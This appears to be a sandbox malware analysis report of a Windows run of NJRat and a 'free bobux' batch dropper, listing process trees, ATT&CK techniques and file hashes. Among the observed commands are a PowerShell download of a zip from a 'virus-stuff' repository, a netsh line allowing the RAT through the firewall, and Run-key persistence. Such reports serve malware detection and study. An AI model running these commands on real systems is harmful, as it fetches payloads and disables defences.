  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6964 /prefetch:8
  2⤵
  PID:6136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:1
  2⤵
  PID:4256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6996 /prefetch:8
  2⤵
  PID:5012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6996 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
  2⤵
  PID:3956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1736 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
  2⤵
  PID:5260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6760 /prefetch:8
  2⤵
  PID:5328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2216,6695141665012953642,1486645780544016555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6708 /prefetch:8
  2⤵
  PID:720
- C:\Users\Admin\Downloads\NJRat (1).exe
  "C:\Users\Admin\Downloads\NJRat (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5100
- C:\Users\Admin\Downloads\NJRat (1).exe
  "C:\Users\Admin\Downloads\NJRat (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1112

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2248

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4640

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3556

C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:852
- C:\Windows\SysWOW64\netsh.exe
  netsh firewall add allowedprogram "C:\Users\Admin\Downloads\NJRat.exe" "NJRat.exe" ENABLE
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5908

C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5964

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5500
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3064
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1968 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9d36449-e916-46a7-be97-7540db572892} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" gpu
    3⤵
    PID:5308
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2368 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {22fc7ca5-3c31-4286-abde-7c9e51ea6dd8} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" socket
    3⤵
    - Checks processor information in registry
    PID:5544
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3736 -childID 1 -isForBrowser -prefsHandle 3308 -prefMapHandle 2816 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {508651c9-db16-4c93-af8f-429d402dbc61} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" tab
    3⤵
    PID:224
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4352 -childID 2 -isForBrowser -prefsHandle 4344 -prefMapHandle 4340 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17aba982-e4fb-44f2-9db6-8c9e6b93c144} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" tab
    3⤵
    PID:2712
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5024 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4252 -prefMapHandle 5016 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a65f4e9b-befe-4047-b6a1-cb5b0afca3b8} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" utility
    3⤵
    - Checks processor information in registry
    PID:3912
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5304 -childID 3 -isForBrowser -prefsHandle 5296 -prefMapHandle 5272 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b459a95e-8549-4e0f-9ba7-a0d6f2391468} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" tab
    3⤵
    PID:5840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 4 -isForBrowser -prefsHandle 5448 -prefMapHandle 5456 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {def5b170-70a5-4947-a422-9496e769658b} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" tab
    3⤵
    PID:3468
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5616 -childID 5 -isForBrowser -prefsHandle 5624 -prefMapHandle 5628 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d262bc5-0661-493d-9d92-012b3c428499} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" tab
    3⤵
    PID:5892
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5296 -childID 6 -isForBrowser -prefsHandle 5332 -prefMapHandle 5464 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {213ca661-0ca4-48d0-aeae-5e4e1a176926} 3064 "\\.\pipe\gecko-crash-server-pipe.3064" tab
    3⤵
    PID:4920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffbb50146f8,0x7ffbb5014708,0x7ffbb5014718
  2⤵
  PID:4464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
  2⤵
  PID:5860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
  2⤵
  PID:3804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
  2⤵
  PID:2708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
  2⤵
  PID:2180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
  2⤵
  PID:5924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
  2⤵
  PID:1860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1
  2⤵
  PID:5752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
  2⤵
  PID:5256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4320 /prefetch:8
  2⤵
  PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
  2⤵
  PID:3080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5712 /prefetch:8
  2⤵
  - Modifies registry class
  PID:5316
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
  2⤵
  PID:1560
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
  2⤵
  PID:940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
  2⤵
  PID:1944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
  2⤵
  PID:5324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
  2⤵
  PID:3612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
  2⤵
  PID:620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
  2⤵
  PID:6036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5824 /prefetch:8
  2⤵
  PID:5784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
  2⤵
  PID:5544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6892 /prefetch:8
  2⤵
  PID:1592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:1
  2⤵
  PID:5256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6632 /prefetch:8
  2⤵
  PID:2704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,15239075120824491594,2951408357386907145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7088 /prefetch:8
  2⤵
  PID:1116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free bobux.bat" "
  2⤵
  PID:1712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3976
- C:\Users\Admin\Downloads\robux.exe
  "C:\Users\Admin\Downloads\robux.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3936
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9826.tmp\9827.tmp\9828.bat C:\Users\Admin\Downloads\robux.exe"
    3⤵
    PID:4132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5316
  - - C:\Windows\system32\timeout.exe
      timeout /t 10 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5580

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3504

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5260

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x414 0x4bc
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\NJRat (1).exe.log

Filesize
319B

MD5
da4fafeffe21b7cb3a8c170ca7911976

SHA1
50ef77e2451ab60f93f4db88325b897d215be5ad

SHA256
7341a4a13e81cbb5b7f39ec47bb45f84836b08b8d8e3ea231d2c7dad982094f7

SHA512
0bc24b69460f31a0ebc0628b99908d818ee85feb7e4b663271d9375b30cced0cd55a0bbf8edff1281a4c886ddf4476ffc989c283069cdcb1235ffcb265580fc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\1c0ea384-99dc-4e59-8a92-448b91a9d39f.tmp

Filesize
11KB

MD5
ef153dd38a3c7bc802177ee1a93fb614

SHA1
8933d13f01305351ce3a4ecedaa7f6c6afa358e2

SHA256
4779295d4fad8be2981ea54668980013221ddef70f7a0609af15f4430c6f8515

SHA512
8601ed1895e1370769924e4e036783ef260c76542e5843181593030ab5615002bedb4016362a6d5dccc509f6c93cec5a32e1eb1d138091656b9620f0251ba506

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fb0f08f75ae1610c21fbaa419f4a274e

SHA1
3478eb8dee288604986d5eca67a1bbbf10334379

SHA256
099ccaae6746daa456cec0c595b5b0aa76eb182d8e3785fbb2082c45854d9c09

SHA512
2777ed62a543b305a36dd948c5a16e8f81434b1410488e3f0b38ad1737f7a41d4aaa4b1c7e920416b762d781d6cc27f3b823bb8e5ad59c55855bebe5ab440455

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0c528784aeedb5eb7ce0fed764cfbd2c

SHA1
6e1dfdaa9ecaf1ef285332677e7c2dbe45508acd

SHA256
4293a0702aac67d4d3ee0f3ae5c787f7fb66680b8d3af82a953c904a2379f89a

SHA512
755b2e2c3b973a898b506f8f97506eda139cad0e8b833a1dd21bc64de4b28bb6294fd3aeacc534ea36f4753a65135fb50ca348935b64f9b93f02a956d5376606

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9b008261dda31857d68792b46af6dd6d

SHA1
e82dc88e2d1da2df7cb19d79a0346b9bb90d52b3

SHA256
9ac598d4f8170f7e475d84103aead9e3c23d5f2d292741a7f56a17bde8b6f7da

SHA512
78853091403a06beeec4998e2e3a4342111895ffd485f7f7cd367741a4883f7a25864cba00a6c86f27dc0c9ce9d04f08011ecc40c8ae9383d33274739ac39f10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0446fcdd21b016db1f468971fb82a488

SHA1
726b91562bb75f80981f381e3c69d7d832c87c9d

SHA256
62c5dc18b25e758f3508582a7c58bb46b734a774d97fc0e8a20614235caa8222

SHA512
1df7c085042266959f1fe0aedc5f6d40ceba485b54159f51f0c38f17bb250b79ea941b735e1b6faf219f23fe8ab65ac4557f545519d52d5416b89ad0f9047a31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
e346d4bf33fbd10f0b9e9eb263ca0d0f

SHA1
2380c5d9f489c2564b18324ec4c892c475095c25

SHA256
8c890ad27086f0eb67b78463ddb9bb2c7c9a684adcdc4e868a589f8a92bd3836

SHA512
9e9543818b3c7e346b65bbcd5e85a9812b48fb4b706fd8bb889087086d2992cbdebb4fc61d2dbbc5d0d15bf72ab0c84422eba51c19075875cc002d42d07fd45d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
